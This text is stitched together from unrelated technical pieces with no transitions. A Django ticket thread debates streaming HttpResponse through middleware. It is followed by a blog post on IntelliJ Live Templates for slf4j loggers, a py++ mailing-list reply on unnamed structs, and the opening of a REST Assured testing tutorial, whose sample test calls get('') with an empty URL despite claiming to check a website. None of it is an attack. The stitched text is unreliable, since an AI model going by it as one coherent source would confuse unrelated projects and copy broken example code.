    - When HttpResponse iterates over itself the first time it should just save the already encoded stream to avoid encoding multiple times as well as iterating.
    I mean instead of self._container = [''.join(self._container)] it should be like self._container = [''.join([s for s in self])]

If encoding should be performed in next, then should _get_content be altered to simply return ''.join(self._container) after consuming the generator with self._container = [''.join(self)]? And should next behave like _get_content does now, and not encode if Content-Encoding is set, otherwise use smart_str?

-.

Indeed, those middleware that can operate on chunks of content should not consume the content generator, but should only replace it with a new generator. This is the problem solved by this patch, where middleware that are not aware of a content generator consume it and break streaming.

Middleware can already replace the content generator with response.content = (something(chunk) for chunk in response.content_generator), because _set_content will check if the value is an iterable or a string. As mentioned above, I think we need to expose content_generator for two purposes. The first is to indicate to middleware that the response is derived from a generator, so that the middleware can skip incompatible functionality (e.g. ETag generation) or replace the content generator instead of replacing the content directly. The second is to provide access to the original content generator. Currently next will encode any value that is unicode. If a middleware sets a new content generator which yields a unicode value (e.g. response.content = (unicode(chunk) for chunk in response)), the encoding will occur twice.

comment:6 Changed 10 years ago by

The more I think about this, the more I'm -1 on it.
The complications of trying to force lazily-evaluated responses are far too numerous (ranging all the way from resource leaks on the Django side out to things like WSGI forbidding useful HTTP features which help with this), and the existence of specialized solutions for doing long-lived HTTP and/or asynchronous stuff is too plentiful to justify Django special-casing enough stuff to make this work.

comment:7 Changed 10 years ago by

I don't understand the resistance. Streaming HttpResponse functionality has been in trunk for around 2 years now. All I'm suggesting is that we fix certain middleware that ships with Django to work with the streaming functionality that's already present in trunk where possible and appropriate - e.g. GZip, ETag, etc. - and add a public attribute to HttpResponse to aid the conditional execution of middleware code. If there are certain middleware that cannot work with dynamic content generators, they continue to work as they do now. If there are certain handlers (WSGI) which don't at present work without a Content-Length header, they continue to work as they do now. Middleware authors can continue to develop middleware without even being aware that anything has changed. Existing 3rd party middleware will continue to work as it does now. This should be backwards compatible. I don't see how what's been added (essentially just skipping certain middleware functionality if a generator was used, or being able to replace an existing generator with a new one) would cause any of the numerous complications you mention that aren't already, and haven't already been, present for the past 2 years.

comment:8 Changed 10 years ago by

I was thinking about this some time and changed my mind a little... I agree with Tai Lee that this ticket is not about some abstract ultimate way of keeping streaming responses streaming after middleware. It's about fixing some points that can be fixed.
However, I now think that the current patch does it the wrong way, for two reasons.

- It relies on how the response was constructed, which doesn't always correlate with the need to apply certain middleware. For example, one may still want to compute an ETag or gzip the content of small files which will be treated as generators.
- Gzipping a stream just can't work, because WSGI wants Content-Length to be set for the response, and it's impossible to compute without gzipping the whole contents.

So maybe what's really needed here is a simple way for a view to explicitly flag the response with "don't gzip it" or "don't etag it".

comment:9 Changed 10 years ago by

I agree that it would also be useful to be able to disable certain middleware per HttpResponse. You are correct in saying that the way a response is created won't always indicate which middleware we want to disable. However, if a certain middleware CAN run without breaking a content generator (e.g. GZip when not using WSGI), shouldn't it do so? How would such a feature be implemented? Pass a list of middleware (e.g. ['django.middleware.common.CommonMiddleware', 'django.middleware.gzip.GZipMiddleware'])? That could be prone to error, requiring people to remember which middleware are required to be removed in order to preserve streaming functionality. What about setting a boolean attribute consume_generator on HttpResponse which defaults to True? If this is True, then the generator is consumed immediately and replaced with the resulting content string. If it's False, then any middleware, or partial functionality within some middleware, that can't work without consuming the content generator is skipped.

Changed 10 years ago by

add stream_content argument.

comment:10 Changed 10 years ago by

Updated patch to add a stream_content argument (defaults to False) to specify whether or not the content generator should be consumed immediately. Middleware can then assume that if a content generator exists, the user intended it to be preserved.
Default behaviour will be to consume content, and if middleware authors want to (and can) work with streaming content, all they need to do is set response.content to a new generator (and we make response.content_generator available publicly so they can alter the original generator if one is set).

comment:11 Changed 10 years ago by

    if a certain middleware CAN run without breaking a content generator (e.g. GZip when not using WSGI), shouldn't it do so?

I don't think so. It would break feature parity between mod_python and WSGI and thus make it harder for users to switch deployment scheme. Furthermore, WSGI requiring Content-Length is a good thing, because otherwise browsers won't show download progress. I think it's a bad side effect.

    What about setting a boolean attribute consume_generator on HttpResponse which defaults to True.

The point of my previous comment was that there shouldn't be a generic attribute at all, because generically it doesn't make any sense. I really meant just this:

    def my_view(request):
        response = HttpResponse(open('somefile'))
        if os.path.getsize('somefile') > 1024:
            response.dont_gzip = True

    class GzipMiddleware:
        def process_response(self, request, response):
            if getattr(response, 'dont_gzip'):
                return

And a similar attribute for CommonMiddleware about etag. In other words, I think that the fact that a certain two middleware can skip their action in very certain conditions should remain their own detail and shouldn't affect other parts of the framework.

comment:12 Changed 10 years ago by

The WSGI specification does NOT require that Content-Length be specified for a response. If you are making assumptions based on that belief, they will be wrong.

comment:13 Changed 9 years ago by

Milestone post-1.0 deleted

comment:14 Changed 9 years ago by

comment:15 Changed 9 years ago by

Re-targeting for 1.2.

comment:16 Changed 9 years ago by

There is a bug in the function utils.text.compress_sequence provided in the patch.
Because it never closes the zfile, it misses a few trailing bytes of output, causing invalid output. Some decompressors (e.g. many browsers) seem tolerant of this, but many (e.g. Googlebot, gunzip) are not. The fix is straightforward; a patch to text.py is attached. This also has a warning (feel free to exclude if you wish!) for users of the function that its compression performance is not as good as compress_string (though obviously it has other advantages). As a final note, in our local installation we use the Z_FULL_FLUSH option on zfile.flush(), with some penalty in compression performance, so that browsers can start rendering the streaming output immediately, without having to wait for further bytes to complete decompression. This may not be an appropriate change for all installations, so I didn't include it here, though it might be useful as an option. Hope this is helpful.

Changed 9 years ago by

Bug fix for invalid compression output in compress_sequence

comment:17 Changed 8 years ago by

comment:18 Changed 8 years ago by

I just updated the patch to work with trunk r11381 and also rolled in the compress_sequence fix. I also removed the set_content_length parts for WSGI, since it appears to be valid in HTTP 1.0/1.1 and WSGI to omit this header when the content length is not known. The full test suite passes. I've been using this patch in my local branch of Django for over a year now, first with Apache/mod_python, and now with Apache/mod_wsgi, and have not noticed any ill effects. I've discussed this with ccahoon recently, who is working on the http-wsgi-improvements branch, and I cannot see a way for any middleware to ever work with a streaming response (when possible and appropriate, e.g. gzip) without having a hook back into the HttpResponse object where it can alter the existing generator in-place.
I think this is a fairly useful ability for middleware, so I'd still like to see any generator passed in as content to HttpResponse exposed for middleware to inspect and replace, or to automatically disable any functionality that is irrelevant to generator content (e.g. etags). I don't believe that this is the complete solution. There will still be cases where middleware *must* consume the content in order to function (e.g. csrf, which is conditionally applied to HTML content types). For these cases there needs to be a way for users to disable specific middleware for a specific response, so that streaming can still function; this may also be useful for other purposes. I suggest that we simply add an attribute HttpResponse.disabled_middleware (list or tuple). Any installed middleware specified there should be bypassed when applying response middleware. Django could then ship with an HttpStreamingResponse class that disables any included middleware that is known not to work with generator content, and this could easily be subclassed and updated by users who need to disable any 3rd party middleware to create a streaming response. My own use case for streaming responses is that I often need to export large sets of model data in CSV format, sometimes manipulating the data as I go, which can result in a significant wait before the entire content is consumed. Besides the also-significant memory usage, the delay before content delivery can start often causes browser timeouts. I'm hesitant to simply increase the timeout because it's not really solving the problem, and users will often think that something is wrong if a download doesn't start quickly. My only alternative without streaming responses is to look into an offline job queue solution, which seems further outside the scope of django, and introduces a requirement for notifying users when their download is complete.
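The CSV-export use case described in the comment above can be served by a plain generator. A minimal sketch (not code from the actual patch; the function name and row data are made up for illustration), where each row is serialised into a small in-memory buffer and yielded as soon as it is produced, so the first bytes can reach the browser immediately:

```python
import csv
import io

def stream_csv(rows):
    """Yield CSV output row by row instead of building the whole
    document in memory, so the response can start immediately."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    for row in rows:
        writer.writerow(row)
        yield buf.getvalue()   # emit this row's text straight away
        buf.seek(0)
        buf.truncate()         # reset the buffer for the next row
```

A streaming-aware response class would pass this generator straight through to the WSGI server, rather than joining it into one string first.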
Changed 8 years ago by

comment:19 Changed 8 years ago by

Changeset [11449] on the branch sco2009/http-wsgi-improvements has my attempt at solving this problem, using a new response class (http.HttpResponseStreaming) and class attributes for streaming-safe response middleware. It has tests and docs. I am not sure how I feel about the test coverage, but it does show that at least it operates correctly as an HttpResponse, and that the content doesn't get consumed on initialization of the response. I used code and ideas from the existing patches here, with some additional changes.

comment:20 Changed 8 years ago by

FYI - the use of HttpResponse.content in the CSRF middleware should hopefully go away completely in Django 1.4. Before then (Django 1.2, hopefully), it will be isolated in a deprecated middleware, replaced by a streaming-friendly method. See CsrfProtection for more.

comment:21 Changed 8 years ago by

For people with problems with file streaming, you can use a simple workaround.

comment:22 Changed 8 years ago by

Bumping from 1.2: there's still no agreement about the correct approach here.

comment:23 Changed 7 years ago by

Changed 7 years ago by

comment:24 Changed 7 years ago by

Just updated the patch to apply cleanly against trunk again. Removed (now) redundant changes to CSRF middleware (it no longer breaks streaming). Also made _get_content_generator() consistent with _get_content() in that it now calls smart_str() on each chunk. This was causing me problems when passing a generator that yielded unicode strings instead of bytestrings, which was breaking compress_sequence().

comment:25 Changed 6 years ago by

comment:26 Changed 6 years ago by

It's clear to me that we have to do *something* about this (though *what* is far from obvious).
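The compress_sequence bug discussed in comment:16 (the GzipFile never being closed, so the trailing CRC/length bytes are never emitted and strict decompressors like gunzip reject the output) can be illustrated with a standalone sketch. This is a simplified illustration rather than Django's actual implementation, and it assumes the default zlib sync-flush mode:

```python
import gzip
import io

def compress_sequence(sequence):
    """Gzip an iterable of bytestrings chunk by chunk. The final
    zfile.close() is the crucial fix: without it, the gzip trailer
    (CRC32 and length) is never written, producing invalid output."""
    buf = io.BytesIO()
    zfile = gzip.GzipFile(mode='wb', fileobj=buf)
    yield buf.getvalue()          # the gzip header, written on open
    buf.seek(0)
    buf.truncate()
    for item in sequence:
        zfile.write(item)
        zfile.flush()             # push compressed bytes into buf
        data = buf.getvalue()
        if data:
            yield data
            buf.seek(0)
            buf.truncate()
    zfile.close()                 # writes the trailing CRC/length bytes
    yield buf.getvalue()
```

Flushing after every chunk costs some compression ratio compared to compress_string, which matches the warning mentioned in comment:16.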
Changed 6 years ago by

Patch for Django 1.3.1 (uses md5_constructor instead of hashlib.md5)

comment:27 Changed 6 years ago by

It doesn't advance the discussion on what to do next, but the patch I just added should let people like me, who wanted to painlessly apply mrmachine's patch to Django 1.3.1, do so.

comment:28 Changed 6 years ago by

comment:29 Changed 5 years ago by

I've updated this patch on a branch at GitHub. If somebody can provide some concrete direction on the desired approach to resolve this (BDFL decision?), I'll try to add docs and tests as well. FYI, I've been using this patch in various incarnations for 4 years in production environments without any problems. My vote is still for allowing middleware to ask the response if it is streaming (generator as content) or not, and act accordingly: either by changing their behaviour (to be compatible with streaming responses), doing nothing (to avoid breaking a streaming response), or forcing the response to consume the content (breaking the streaming response, but ensuring that the middleware always runs).

comment:30 Changed 5 years ago by

Updated this patch with some minor tweaks arising from IRC discussion with akaariai. Consume generator content on access, not assignment, so that generator content can still stream if no middleware has to access response.content. Raise PendingDeprecationWarning if you explicitly create an HttpResponse with streaming_content=True and then you (or some middleware) accesses response.content. Also see the recent google developers discussion at

comment:31 Changed 5 years ago by

comment:32 Changed 5 years ago by

I've updated the patch on my branch after further feedback from Aymeric Augustin and Anssi Kääriäinen on the google groups discussion. The new patch refactors HttpResponse into HttpResponseBase and HttpResponse classes, and adds a new HttpStreamingResponse class.
The HttpResponse class is simplified, and will consume iterator content whenever it is assigned, so that content can be safely accessed multiple times. The HttpStreamingResponse class exposes a new attribute, streaming_content. If you assign an iterator as streaming content, it will not be consumed until the response is iterated. The streaming content can be wrapped with a new generator (e.g. by GZipMiddleware). The class prevents accidental assignment to the content attribute, to avoid confusing middleware that checks for a content attribute on response objects. Both classes use HttpResponseBase.make_bytes() to yield bytestrings when iterated, or a single bytestring when HttpResponse.content is accessed. This has simplified the implementation a little and removed some duplication. The close() method will now close all "file-like" content objects that were assigned to content or streaming_content, even if they are later replaced by different content. I think the old code would have left unclosed objects in this case. As an added bonus, you can now write() to both regular and streaming responses, whether iterable or non-iterable content is assigned. For streaming responses, this just wraps the old streaming content with a new generator that yields an additional chunk at the end. For regular responses, assigned content is always normalised to a list now, so we can always append additional content. Middleware have been updated for compatibility with streaming responses. They now check responses for content or streaming_content before attempting to read or replace those attributes. New and 3rd party middleware should follow this example. We now have tests, too, and the full test suite passes here (2.7, OS X, SQLite). If this approach is accepted, I will add docs as well.

comment:33 Changed 5 years ago by

I've updated the branch again slightly, to use HttpStreamingResponse in the django.views.static.serve view. This is MASSIVELY faster on my local machine.
It was slightly less of an improvement with GZipMiddleware enabled, but still a huge improvement compared to regular responses. I noticed this when I was testing a site that hosts a 16MB iPad app. When I tried to install the app on the iPad from my local dev/test site, it was *extremely* slow. So I tried to download the file directly with Firefox on the same machine. Firefox was pulling it down at 60-70KB/s from localhost. When using HttpStreamingResponse instead, it's instantaneous. This is not only useful or noticeable with large files; in general, all images and other static content now load MUCH faster with the dev server. Previously I could literally see even small files (60KB images) being progressively drawn to the page. Now it's all instant. Much nicer during development, especially on image-heavy sites. I also found that django.http.utils.conditional_content_removal() was accessing response.content directly. I've updated that to work with regular and streaming responses. I couldn't find *any* tests for this function (or any in django.http.utils), so I added a new regression tests package, http_utils.

comment:34 Changed 5 years ago by

Quick skimming, and it looks good. Could you create a pull request for easier reviewing? I will try to see if we can get this into 1.5. Unfortunately the HTTP protocol isn't my strongest area, so help is welcome for reviewing...

comment:35 Changed 5 years ago by

I've added docs (the patch should be complete now), and opened a pull request.

comment:36 Changed 5 years ago by

There's a lot of history on this ticket; I reviewed as much as possible but couldn't read everything. Here's the current status of my review. I'm still at the design decision level; I haven't looked at the code yet.

Hard requirements

- The behavior of responses instantiated with a string must not change.
- Below, I'm only considering responses instantiated with an iterator (often a generator).
- Accessing response.content in a regular HttpResponse must exhaust the iterator and switch to a string-based response, which can be repeatedly accessed.

Requirements

- Discussions on CSRF middleware are moot for the reason explained by Luke in comment 20.
- Discussions on the Content-Length header can be ignored; it's optional and should be omitted if it can't be computed efficiently.
- Discussions about conditionally disabling response middleware are outside of the scope of this ticket.
- I'm -1 on HttpResponse.disabled_middleware and all similar ideas, especially those requiring new settings — it's already way too difficult to figure out how to make middleware run in a meaningful order.

Personal opinions

- I consider streaming a large CSV export a valid use case. Ultimately we should be able to stream from the database to the end user (I know this isn't possible with django.db right now). The two other use cases brought up in the latest discussion are also interesting.
- I have absolutely no interest in fixing GzipMiddleware. I'd rather deprecate it, on the grounds that it's prohibited by PEP 3333 (and everyone should be using WSGI these days).

Questions

- One of the goals is to switch some parts of Django (e.g. django.views.static.serve) to streaming by default. This will be backward incompatible if the StreamingHttpResponse API isn't (at least temporarily) a superset of the HttpResponse API — specifically if accessing StreamingHttpResponse.content raises an exception.
- In the long run, accessing StreamingHttpResponse.content should raise an exception, in order to guarantee the streaming behavior isn't accidentally broken by middleware.
- This is why StreamingHttpResponse provides the content in a different attribute: streaming_content.
- We could use a deprecation path to solve both issues at the same time: StreamingHttpResponse.content would work initially, but be deprecated and removed in 1.7.
- Middleware must be able to provide different implementations for regular and streamed responses.
- The suggested idiom is if hasattr(response, 'streaming_content'): .... This is more pythonic than the alternative if isinstance(response, StreamingHttpResponse): ..., but it still looks wrong.
- I'm considering adding get_streaming_response to the response middleware API. If a response is a streaming response (which would be determined by duck-typing: hasattr(response, 'streaming_content')) and the middleware provides a get_streaming_response method, that method would be called. Otherwise get_response would be called. Middleware authors who want to support streaming responses will have to implement that new method.

comment:37 Changed 5 years ago by

I assume you meant process_response() and process_streaming_response() methods for middleware classes? I think this would be much nicer to work with, and easier to explain to middleware authors, than asking them to do hasattr(response, 'streaming_content'). But it would mean a little more work to refactor some of the bundled middleware classes. One thing you didn't mention is automatically closing file-like objects passed as content to regular and streaming responses. For streaming responses, Django should close them automatically, because users won't be able to. I think that we should do the same for regular responses as well, for consistency and to avoid accidentally leaving files open. I'm not sure if this would be a backwards incompatible change, or if it would need a deprecation path, or if a deprecation path would be possible? I guess this could be implemented separately, if it is decided to go ahead.

comment:38 Changed 5 years ago by

Yes, I meant process_response. I didn't look at the closing issue yet, but it shouldn't be a problem.

comment:39 Changed 5 years ago by

Design decisions

- I'm not going to refactor HttpResponse right now; there's another ticket about that.
- I'm going to introduce a subclass of StreamingHttpResponse that provides a deprecated content attribute, and use that class in the static serve view, to preserve backwards compatibility.
- I'm going to introduce a response.streaming boolean flag to avoid the hasattr(response, 'streaming_content') pattern.
- I'm not going to change the middleware API.

comment:40 Changed 5 years ago by

I've finished working on a patch. Barring unexpected objections, I'll commit it soon. To keep things manageable, I have made the minimum changes required to support streaming responses and enable them in the static serve view. I've taken care not to change the behavior of HttpResponse in any way. (I've saved that for #18796.) I've kept the tests written by mrmachine (with the exception of those that tested changes to HttpResponse). I've rewritten the code to make fewer changes, because I didn't trust myself enough to push such a large and sensitive patch in a single commit.

Changed 5 years ago by

comment:41 Changed 5 years ago by

mrmachine's patch contained code to call close() on the response object when the generator terminates. This isn't necessary, because the WSGI server is already required to call that method when the response is finished. I removed it.

comment:42 Changed 5 years ago by

comment:43 follow-up: 44 Changed 5 years ago by

Excellent. Very happy to see this committed. I have a couple of comments that may or may not be important.

- We're not checking if the close attribute on assigned content is callable before adding it to _closable_objects? Probably an edge case not worth worrying about, though.
-.
- There may still be a case for consuming iterators assigned to HttpResponse.content immediately, rather than on first access. Maybe after a deprecation period, though? If HttpResponse._container is an iterator, the response can't be pickled by cache middleware. It would also allow additional content to be written to the response.
This is probably an issue for another ticket, anyway.

-).

- The note in the docs about iterators being closed after the response is iterated, as a point of difference from regular responses, is not true anymore. We rely on WSGI to call close() on both regular and streaming responses.
- The http_utils test wasn't included?

comment:44 Changed 5 years ago by

- We're not checking if the close attribute on assigned content is callable before adding it to _closable_objects? Probably an edge case not worth worrying about, though.

Yes, primarily because callable is gone in Python 3. If someone has a custom file-like / iterator object that has a close attribute that isn't callable, that'll teach him a bit of API design principles :)

-?

I'm not sure which part of that blog post you're referring to. This sentence indicates that close() should be called once: The intent of that statement, at least from the perspective of the WSGI server, is that close() only be called once all content has been consumed from the iterable and that content has been sent to the client. Furthermore, close() can usually be called on objects that are already closed; it just does nothing.

-.

That's what #18796 is about: normalizing the conversion of the content to bytes (which is moot because content is already bytes in 99.99% of responses). I'll copy your remark over there.

- There may still be a case for consuming iterators assigned to HttpResponse.content immediately, rather than on first access. Maybe after a deprecation period, though? If HttpResponse._container is an iterator, the response can't be pickled by cache middleware.

If that's true, it's a bug of the cache middleware, which can easily be fixed by making it access response.content. If that bug wasn't reported yet, could you create a new ticket?

It would also allow additional content to be written to the response. This is probably an issue for another ticket, anyway.

Allowing writes to a regular response instantiated with an iterator is #6527.
I've uploaded a patch extracted from your work over there.

-).

This never came into the discussion until now; could you create a new ticket for this feature request?

- The note in the docs about iterators being closed after the response is iterated as a point of difference from regular responses is not true anymore. We rely on WSGI to call close() on both regular and streaming responses.

I'll fix that.

- The http_utils test wasn't included?

Oops, my git-fu must have failed me. I'll commit them separately.

comment:45 Changed 5 years ago by

comment:46 Changed 5 years ago by

comment:47 Changed 5 years ago by

comment:48 Changed 5 years ago by

It should be noted that the Apache2 webserver by default (at least on Ubuntu Linux) enables mod_deflate, which suffers from the same issue and thus effectively prevents streaming. With mod_deflate disabled, streaming with Django works very nicely.

Changed to DDN after comments from Malcolm and Ivan on google groups. The arguments against are that: 3rd party middleware authors will be unable to access the content for an HttpResponse because its content may be an un-consumable generator; middleware will repetitively be required to replace HttpResponse.content with a string if a generator is consumed; Content-Length *must* always be set with WSGI. The argument for is that 3rd party middleware should have the *option* of working with HttpResponse objects which have an un-consumable generator (e.g. GZipMiddleware). If middleware authors fail or choose not to account for this possibility, behaviour will remain as it is today, as it would be if generators were consumed immediately when instantiating an HttpResponse object. A possible alternative raised by Malcolm is to add a way to bypass process_response in middleware (or bypass all middleware) for specific HttpResponse objects. However, this would disallow potentially useful middleware that *can* work without consuming the content generator (e.g. GZipMiddleware).
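The duck-typing idiom debated in the comments above can be sketched in plain Python. The two response classes below are simplified stand-ins rather than Django's real implementations; only the hasattr(response, 'streaming_content') check mirrors the API under discussion:

```python
# Simplified stand-ins for Django's response classes (not the real implementations).
class HttpResponse:
    streaming = False

    def __init__(self, content=b""):
        self.content = content


class StreamingHttpResponse:
    streaming = True

    def __init__(self, streaming_content):
        self.streaming_content = streaming_content


def upper_middleware(response):
    """A toy process_response that must treat streaming responses differently."""
    if hasattr(response, "streaming_content"):
        # Wrap the iterator lazily instead of consuming it here.
        response.streaming_content = (chunk.upper() for chunk in response.streaming_content)
    else:
        # Regular responses can simply be rewritten in place.
        response.content = response.content.upper()
    return response


regular = upper_middleware(HttpResponse(b"hello"))
print(regular.content)  # b'HELLO'

streaming = upper_middleware(StreamingHttpResponse(iter([b"he", b"llo"])))
print(b"".join(streaming.streaming_content))  # b'HELLO'
```

A process_streaming_response() hook, as floated in comment 37, would essentially move the first branch into its own method instead of hiding it behind the hasattr check.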
I've updated the patch with a few improvements:

- HttpResponse.content_generator, which will return the content generator if one is present. Middleware authors can use this to check for the existence of, or actually get, the content generator. We no longer need to access the private attributes HttpResponse._is_string or HttpResponse._container from middleware. We can still assign a string or generator to HttpResponse.content in the case where we need to replace the content or generator in middleware. HttpResponse.content will now consume any content generator that exists and replace HttpResponse._container with the resulting string, ensuring that the generator is only consumed once.
- A set_content_length method added to WSGIHandler.response_fixes to ensure that Content-Length is *always* set with WSGI. Although, I have found some discussion to support the removal of Content-Length by WSGI servers, with specific examples for GZipped content. Requiring Content-Length on every single response which has content with WSGI will make streaming a response impossible under any circumstances. This is quite useful functionality (exporting large sets of data), so if it turns out to be acceptable to stream content through WSGI without a Content-Length header (as opposed to an incorrect Content-Length header), or the WSGI spec changes to allow for this, I'd love to see the WSGIHandler.set_content_length method removed.

FYI, I have tested this without HttpResponse.set_content_length and with GZipMiddleware enabled on Apache with mod_wsgi, and it does work (stream) as intended. Personally, I don't feel that it is an unreasonable restriction to place on middleware authors to ask them to make use of HttpResponse.content_generator *if* they want or need their middleware to work with streaming content. It's also not unreasonable for developers to check that the middleware they are using will work with streaming content, if they require streaming content.
After all, some middleware by their very nature will not work with streaming content.
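The Content-Length concern threaded through these comments is easy to demonstrate outside Django. This standalone sketch (plain Python, no Django required) shows why a Content-Length computed before a compressing middleware runs no longer describes the bytes actually sent:

```python
import gzip

body = b"x" * 1000  # stand-in for a rendered response body
headers = {"Content-Length": str(len(body))}

# Roughly what a gzipping middleware does to the body after the header was set:
compressed = gzip.compress(body)

# The precomputed header no longer matches the wire payload, so it must be
# recomputed -- or simply omitted, which is what makes streaming possible.
print(headers["Content-Length"], len(compressed))
```

With generator content the original length is not even knowable up front, which is why the thread keeps returning to the question of whether WSGI truly requires the header at all.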
https://code.djangoproject.com/ticket/7581?cversion=0&cnum_hist=39
IntelliJ IDEA is an awesome IDE, and a lesser known and used feature is Live Templates. Live Templates enable you to use code snippets with just a few keystrokes. A lot of great ones are provided out-of-the-box by IntelliJ. You can view them by pressing Double Shift and then typing Live Templates. The shortcut works regardless of the OS you're currently using (and I am too lazy to specify OS specific menus). Some examples of Live Templates are:

- Typing psvm expands it to public static void main(String[] args) { }
- Typing psfs magically turns it into public static final String

I was recently refactoring a lot of classes, and I had to replace a lot of legacy logging initialization statements to use the slf4j logging library, like the following:

    import org.slf4j.Logger;
    import org.slf4j.LoggerFactory;

    public class LoggerTest {
        public static final Logger logger = LoggerFactory.getLogger(LoggerTest.class);
    }

I had more than 30 different classes to refactor as above, and I certainly didn't want to painstakingly write everything by hand again (confirms that I'm lazy). Fortunately, IntelliJ Live Templates came to my rescue! I fired up the Live Templates menu using the shortcut mentioned above, and clicked on the + button at the top right. I then clicked on the Live Template button. The UI now points to the bottom pane, which asks you to enter an abbreviation. Let's input the abbreviation psfl, which stands for public static final Logger; this can also be put in the description. Write the following code in the Template text box:

    public static final Logger logger = LoggerFactory.getLogger();

But hang on, the IDE gives us a warning to define a context where the template will be used. We want the template to be used only in Java, so we click on the Define button and select Java. You may notice the IDE now applies syntax highlighting to the template. Wait, we are still not there yet.
I certainly don't want to manually write every class name inside the getLogger function! At this point, I was not sure how I could achieve that. Cue a bit of googling; Stack Overflow again came to the rescue. I found the following answer:

    public static final org.slf4j.Logger logger = org.slf4j.LoggerFactory.getLogger($CLASS_NAME$); $END$

So I copy-pasted the code in my template screen (what did you expect? :P) You'd then need to define what $CLASS_NAME$ means. To do that, click on the Edit Variables button and select className() in the Expression box. The $END$ variable marks where you want your cursor to be after the template is applied. Click on Apply and Ok. We're done! Fire up your classes and refactor with 10x speed!

Relevant link:

Discussion (1)

Another useful one: you can use the $SELECTION$ argument in a live template, so that when you have some code highlighted, you can press Ctrl Alt T and wrap the selection in your template code. For example: Objects.requireNonNull($SELECTION$)
https://dev.to/darshitpp/using-intellij-idea-live-templates-2bce
On Mon, Jun 2, 2008 at 3:01 PM, Hans Meine <meine at informatik.uni-hamburg.de> wrote:
> Hi Roman,
>
> after reporting to Gustavo that pybindgen does not support unnamed structs, I
> tried pyplusplus and found the same (OK, not the same - pyplusplus gracefully
> skips the members with the two warnings "Py++ can not export unnamed
> variables" and "Py++ can not export unnamed classes"). Actually, there are
> two problems:
>
> 1) py++ generates the following code, which does not mention the "low"
> and "high" members wrapped in the struct:
>
>     bp::class_< Word >( "Word" )
>         .def_readwrite( "word", &Word::word );
>
> This should be "easy to fix" - py++ would need to descend into the struct and
> add
>     .def_readwrite( "low", &Word::low )
>     .def_readwrite( "high", &Word::high )

py++ is not going to support unnamed classes, unless someone submits a patch.
The following code does the job (taken as-is from the Python-Ogre project):

    def fix_unnamed_classes( classes, namespace ):
        for unnamed_cls in classes:
            named_parent = unnamed_cls.parent
            if not named_parent.name:
                named_parent = named_parent.parent
            if not named_parent or named_parent.ignore:
                continue
            for mvar in unnamed_cls.public_members:
                if not mvar.name:
                    continue
                if mvar.ignore:
                    continue
                if declarations.is_array( mvar.type ):
                    template = '''def_readonly("%(mvar)s", &%(ns)s::%(parent)s::%(mvar)s)'''
                else:
                    template = '''def_readwrite("%(mvar)s", &%(ns)s::%(parent)s::%(mvar)s)'''
                named_parent.add_code( template % dict( ns=namespace, mvar=mvar.name, parent=named_parent.name ) )

It takes a list of unnamed classes.

> However, the next problem is fatal:
>
> 2) boost::python::class_ only works for structs and classes, but not for
> unions. I am getting an error from is_polymorphic:

Thanks for the bug report. I fixed this problem by excluding unions from being exposed :-)

--
Roman Yakovenko
C++ Python language binding
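The string templating at the heart of the helper above can be exercised on its own. The namespace "mylib" below is a made-up example (the real value is the namespace of the wrapped library); no py++/pygccxml installation is needed to run this:

```python
def render_member(ns, parent, mvar, readonly=False):
    """Build the def_readonly/def_readwrite line that the helper emits."""
    if readonly:
        template = '''def_readonly("%(mvar)s", &%(ns)s::%(parent)s::%(mvar)s)'''
    else:
        template = '''def_readwrite("%(mvar)s", &%(ns)s::%(parent)s::%(mvar)s)'''
    return template % dict(ns=ns, mvar=mvar, parent=parent)


# The "low"/"high" members from the Word example in the thread:
print(render_member("mylib", "Word", "low"))   # def_readwrite("low", &mylib::Word::low)
print(render_member("mylib", "Word", "high"))  # def_readwrite("high", &mylib::Word::high)
```

Each rendered line is what ends up injected into the named parent's Boost.Python registration code via named_parent.add_code().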
https://mail.python.org/pipermail/cplusplus-sig/2008-June/013294.html
Introduction

Having a large collection of unit tests that verify the behaviour of Java classes is only the first step to a sound testing strategy. After all, the fact that individual Java classes work successfully in isolation does not mean that the application itself will also work correctly when all these classes are bundled together. In addition to basic unit tests, we also need integration tests (tests that focus on modules), functional tests (end-to-end tests that use the application as deployed), and even user acceptance tests (tests that examine the GUI as seen by the user). In this tutorial, we will deal with functional tests that do not work directly with Java classes. Instead, they connect to the HTTP endpoints offered by the application server and mimic the role of another client or the browser. Most applications today expose their API as a set of HTTP endpoints that send and receive JSON data. These endpoints can be used either from the GUI layer (i.e. Javascript front-end frameworks) or other back-end applications in different technologies. Making sure that these HTTP endpoints work according to the specifications is an essential requirement if we want to cover the whole development lifecycle and follow the testing pyramid paradigm correctly. We will cover:

- Downloading and setting up REST Assured – a Java library for testing HTTP endpoints,
- Simple tests that perform one interaction with the HTTP endpoint,
- More complex functional tests that require a “conversation” between the client and the HTTP endpoint, and
- Different ways of posting requests and evaluating responses.

Note that REST Assured treats our REST application as a black box during testing. All REST Assured tests send a network request to our application, get a response back, and compare it against a predetermined result. The fact that the application under test is written in Java is irrelevant to REST Assured.
REST Assured bases its tests only on JSON and HTTP, which are language-independent technologies. We can use REST Assured to write tests for applications written with Python, Ruby, .NET etc. As long as our application offers an HTTP endpoint, REST Assured can test it regardless of the implementation programming language. It is convenient for us to use REST Assured for Java applications, as we'll use the same language both for implementation and our unit tests.

Prerequisites

It is assumed that we already have a Java project that offers its services over HTTP/JSON when deployed to an application server. We will need:

- A sample Java project that already has an HTTP/REST/JSON API,
- A valid pom.xml file that builds the project,
- Maven installed (the command mvn should be available in your command line), and
- Internet access to download Maven dependencies.

REST Assured works on top of JUnit, therefore JUnit knowledge is essential. Hamcrest knowledge is helpful but not required, as we will only use some basic Hamcrest matchers. It is also assumed that we already know our way around basic Maven builds. If not, then feel free to consult its official documentation first.

Introduction to REST Assured

REST Assured is a Java library for validation of REST web services. It offers a friendly DSL (Domain Specific Language) that describes a connection to an HTTP endpoint and expected results.

Comparing REST Assured to Other REST Java Libraries

There are many Java libraries that allow us to write a REST client. It is also possible to use a simple HTTP client library and manually (de)serialize JSON data from/to the server. We could use a client library like Jersey or the Spring REST template to write REST unit tests. After all, it is very logical to use the same Java library both on the client and on the server side for the sake of simplicity. However, REST Assured has an additional testing DSL on top of its REST client that follows the BDD paradigm, making tests very readable.
Here is a trivial example:

    import static com.jayway.restassured.RestAssured.given;

    import org.junit.Test;

    public class HelloWorldRestAssured {

        @Test
        public void makeSureThatGoogleIsUp() {
            given().when().get("").then().statusCode(200);
        }
    }

